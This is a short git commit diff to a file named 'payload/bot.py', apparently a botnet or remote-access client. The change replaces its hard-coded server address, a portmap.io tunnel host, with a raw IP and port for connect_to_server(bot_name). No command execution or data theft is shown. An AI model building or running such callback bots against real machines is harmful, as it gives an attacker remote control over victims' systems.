Update payload/bot.py

This commit is contained in:
Syn Naulaid 2024-12-28 16:25:58 +00:00
parent dd7221b9eb
commit 62d319ba43

View File

@ -2,8 +2,8 @@ import socket
import os
import sys
SERVER_HOST = "jabarzad-34105.portmap.io" # Replace with server IP
SERVER_PORT = 34105
SERVER_HOST = "178.63.100.123" # Replace with server IP
SERVER_PORT = 14006
def connect_to_server(bot_name):